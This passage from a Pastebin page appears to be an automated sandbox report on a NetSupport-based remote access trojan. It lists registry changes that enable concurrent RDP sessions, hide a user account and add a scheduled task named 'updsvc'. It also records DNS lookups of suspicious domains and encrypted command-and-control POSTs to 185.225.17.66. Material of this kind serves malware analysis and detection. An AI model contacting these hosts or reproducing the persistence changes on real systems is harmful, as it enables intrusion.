  600. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Licensing Core\\EnableConcurrentSessions",
  601. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions",
  602. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList",
  603. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\WgaUtilAcc",
  604. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\fAllowToGetHelp",
  605. "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server\\RCM\\Secrets",
  606. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_28ada6da-d622-11d1-9cb9-00c04fb16e75",
  607. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Certificate",
  608. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\Secrets\\L$HYDRAENCKEY_52d1ad03-4565-44f3-8bfd-bbb0591f4b9d",
  609. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\CertificateOld",
  610. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\\Blob",
  611. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
  612. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent",
  613. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Path",
  614. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Hash",
  615. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Id",
  616. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\updsvc\\Index",
  617. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\Triggers",
  618. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4CBF3D1D-5FEB-4971-B977-59608B4DCACE\\DynamicInfo",
  619. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05\\DynamicInfo",
  620. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\1C9308F0-8A41-4006-B814-D2F5B13BEDB5",
  621. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\B17E070E-57E3-43F6-96F5-A9A9C921DEBF\\DynamicInfo",
  622. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\8D661787-E909-433D-BDE3-477DCB39306A",
  623. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\DF000DCA-3FA2-48A6-9E59-C0606F9F8D73\\DynamicInfo",
  624. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\1C9308F0-8A41-4006-B814-D2F5B13BEDB5\\data"
  625.  
  626.  
  627. * Deleted Registry Keys:
  628. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\RCM\\OverrideProtocol_Object",
  629. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13",
  630. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job",
  631. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\updsvc.job.fp"
  632.  
  633.  
  634. * DNS Communications:
  635.  
  636. "type": "A",
  637. "request": "gidjshrvz.xyz",
  638. "answers":
  639.  
  640. "data": "",
  641. "type": "NXDOMAIN"
  642.  
  643.  
  644.  
  645.  
  646. "type": "A",
  647. "request": "pofasfafha.xyz",
  648. "answers":
  649.  
  650. "data": "185.225.17.169",
  651. "type": "A"
  652.  
  653.  
  654.  
  655.  
  656. "type": "A",
  657. "request": "apps.identrust.com",
  658. "answers":
  659.  
  660. "data": "192.35.177.64",
  661. "type": "A"
  662.  
  663.  
  664. "data": "apps.digsigtrust.com",
  665. "type": "CNAME"
  666.  
  667.  
  668.  
  669.  
  670. "type": "A",
  671. "request": "fdguyt5ggs.pw",
  672. "answers":
  673.  
  674. "data": "",
  675. "type": "NXDOMAIN"
  676.  
  677.  
  678.  
  679.  
  680. "type": "A",
  681. "request": "letitbe.icu",
  682. "answers":
  683.  
  684. "data": "185.225.17.169",
  685. "type": "A"
  686.  
  687.  
  688.  
  689.  
  690. "type": "A",
  691. "request": "geo.netsupportsoftware.com",
  692. "answers":
  693.  
  694. "data": "62.172.138.35",
  695. "type": "A"
  696.  
  697.  
  698. "data": "geograph.netsupportsoftware.com",
  699. "type": "CNAME"
  700.  
  701.  
  702. "data": "195.171.92.116",
  703. "type": "A"
  704.  
  705.  
  706.  
  707.  
  708.  
  709. * Domains:
  710.  
  711. "ip": "",
  712. "domain": "fdguyt5ggs.pw"
  713.  
  714.  
  715. "ip": "185.225.17.169",
  716. "domain": "pofasfafha.xyz"
  717.  
  718.  
  719. "ip": "192.35.177.64",
  720. "domain": "apps.identrust.com"
  721.  
  722.  
  723. "ip": "",
  724. "domain": "gidjshrvz.xyz"
  725.  
  726.  
  727. "ip": "62.172.138.35",
  728. "domain": "geo.netsupportsoftware.com"
  729.  
  730.  
  731. "ip": "185.225.17.169",
  732. "domain": "letitbe.icu"
  733.  
  734.  
  735.  
  736. * Network Communication - ICMP:
  737.  
  738. * Network Communication - HTTP:
  739.  
  740. "count": 1,
  741. "body": "",
  742. "uri": "http://apps.identrust.com/roots/dstrootcax3.p7c",
  743. "user-agent": "Microsoft-CryptoAPI/6.1",
  744. "method": "GET",
  745. "host": "apps.identrust.com",
  746. "version": "1.1",
  747. "path": "/roots/dstrootcax3.p7c",
  748. "data": "GET /roots/dstrootcax3.p7c HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: apps.identrust.com\r\n\r\n",
  749. "port": 80
  750.  
  751.  
  752. "count": 1,
  753. "body": "",
  754. "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  755. "user-agent": "Microsoft-CryptoAPI/6.1",
  756. "method": "GET",
  757. "host": "www.download.windowsupdate.com",
  758. "version": "1.1",
  759. "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
  760. "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 89965\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
  761. "port": 80
  762.  
  763.  
  764. "count": 1,
  765. "body": "",
  766. "uri": "http://letitbe.icu/2.txt",
  767. "user-agent": "Embarcadero URI Client/1.0",
  768. "method": "GET",
  769. "host": "letitbe.icu",
  770. "version": "1.1",
  771. "path": "/2.txt",
  772. "data": "GET /2.txt HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Embarcadero URI Client/1.0\r\nHost: letitbe.icu\r\n\r\n",
  773. "port": 80
  774.  
  775.  
  776. "count": 1,
  777. "body": "CMD=POLL\nINFO=1\nACK=1\n",
  778. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  779. "user-agent": "NetSupport Manager/1.3",
  780. "method": "POST",
  781. "host": "185.225.17.66",
  782. "version": "1.1",
  783. "path": "http://185.225.17.66/fakeurl.htm",
  784. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 22\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=POLL\nINFO=1\nACK=1\n",
  785. "port": 443
  786.  
  787.  
  788. "count": 1,
  789. "body": "CMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  790. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  791. "user-agent": "NetSupport Manager/1.3",
  792. "method": "POST",
  793. "host": "185.225.17.66",
  794. "version": "1.1",
  795. "path": "http://185.225.17.66/fakeurl.htm",
  796. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 232\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=u\\xfe2h\\x0cr\\xef\\x024\\xd7\\xa7\\xb1%y-\\xa9\\x85\\xaf\\xcf\\xdc=I\\xad\\x88\\xdeD3\\xbcW\\x8e\\x8ai\\xe97?\\xbf\\x03\\xae\\xc8=@\\xfd\\xec\\xc7\\xc1F\\xe5f\\xd5\\xaa\\x9b\\xe8&t\\xc8\\x05\\xc86ra\\x06\\xfeL\\xe0A\\xf2j\\xda\\xf3\\x1a\\x880\\x9c\\xdc=\\xe29\\x04CE\\x84\\x07-\\xa7U\\xf1\\x8d(\\xb4\\xc4\\x944Z\\x92:\\x9f\\xac\\xd2K\\xccG\\xc5\\xb0\\xf6\\x8f\\xe1P\\x99\\xdb\\xbd\\xe0\\xec\\xcf\\xb5\\\\xf9b\\xf2\\x04\\xf4><\\xc9\\x0b\\xec\\x9c\\xdc=\\xe29\\x04CE\\xa8\\xa3\\x93\\xd2\\xd3\\xe6\\xc0\\x13\\x89\\xa3(\\xf1 \\xca4\\xfd\\xe4\\x83\\xcc\\xa9\\xcb\\xa8 \\x1d\\x9c\\x01-\\x8amc\\x97\\xc1\\x10K\\xcb)\\xf2\\x17\\x97\\x08\\xe66\\x85\\x0f\\xfa)\\xff\\x819\\x0f<\\xcf\\x01\\xea\\xa4\\xbe\\xf6\\xd6\\xeeW\\x18\\xc4t\\xbf_\\xb0\\xd5Az\n",
  797. "port": 443
  798.  
  799.  
  800. "count": 1,
  801. "body": "",
  802. "uri": "http://geo.netsupportsoftware.com/location/loca.asp",
  803. "user-agent": "",
  804. "method": "GET",
  805. "host": "geo.netsupportsoftware.com",
  806. "version": "1.1",
  807. "path": "/location/loca.asp",
  808. "data": "GET /location/loca.asp HTTP/1.1\r\nHost: geo.netsupportsoftware.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  809. "port": 80
  810.  
  811.  
  812. "count": 1,
  813. "body": "CMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  814. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  815. "user-agent": "NetSupport Manager/1.3",
  816. "method": "POST",
  817. "host": "185.225.17.66",
  818. "version": "1.1",
  819. "path": "http://185.225.17.66/fakeurl.htm",
  820. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 78\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=l3\\x1d<(T\\x1aE\\x98\\xf8\\xfb\\x14\\xb9V\\x1a\\x1c\\x9a\\xf3k\\xee9|||$(m\\xf2\\xdb$C(^\\xf5 \\xb2\\xd5\\x85\\x03=M\\xb10Y\\x8f=\\xa36\\xce\\xcb\\x9b\\x84\\x98\\x16\\xfd\\xc9\n",
  821. "port": 443
  822.  
  823.  
  824. "count": 4,
  825. "body": "CMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  826. "uri": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm",
  827. "user-agent": "NetSupport Manager/1.3",
  828. "method": "POST",
  829. "host": "185.225.17.66",
  830. "version": "1.1",
  831. "path": "http://185.225.17.66/fakeurl.htm",
  832. "data": "POST http://185.225.17.66/fakeurl.htm HTTP/1.1\nUser-Agent: NetSupport Manager/1.3\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 36\nHost: 185.225.17.66\nConnection: Keep-Alive\n\nCMD=ENCD\nES=1\nDATA=\\x93\\xe8#\\x0e\\xedmH\\xee\\xe5UAA\\xb6\\x89g\\xf8\n",
  833. "port": 443
  834.  
  835.  
  836.  
  837. * Network Communication - SMTP:
  838.  
  839. * Network Communication - Hosts:
  840.  
  841. * Network Communication - IRC:
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!